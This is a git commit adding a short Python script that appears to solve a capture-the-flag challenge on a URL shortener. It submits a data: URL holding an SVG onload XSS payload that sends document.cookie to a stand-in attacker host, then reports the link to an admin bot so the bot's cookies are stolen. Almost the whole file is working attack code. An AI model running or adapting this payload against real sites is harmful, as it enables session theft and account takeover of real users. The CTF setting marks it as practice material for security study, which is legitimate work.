This commit is contained in:
2025-05-31 22:41:14 +02:00
parent e36053882b
commit 5cc21125e5
181 changed files with 174078 additions and 0 deletions

View File

@@ -0,0 +1,25 @@
import requests
ATTACKER_HOST = "http://your.attacker.com/log"
TARGET = "http://target-ctf.com"
# Step 1: Create a shortened URL with a malicious payload
payload_url = f"data:text/html,<svg onload=fetch('{ATTACKER_HOST}?c='+document.cookie)>"
res = requests.post(f"{TARGET}/", data={"original_url": payload_url})
assert res.ok
print("[+] Shortened URL submitted")
# Step 2: Extract short code from the response
from bs4 import BeautifulSoup
soup = BeautifulSoup(res.text, "html.parser")
short_link = soup.find("input", {"id": "shortened"})["value"]
short_code = short_link.split("/")[-1]
# Step 3: Submit to /report endpoint
report_res = requests.post(f"{TARGET}/report", data={"submit_id": short_link})
if report_res.ok:
print(f"[+] Reported to bot: {short_link}")
else:
print("[-] Report failed")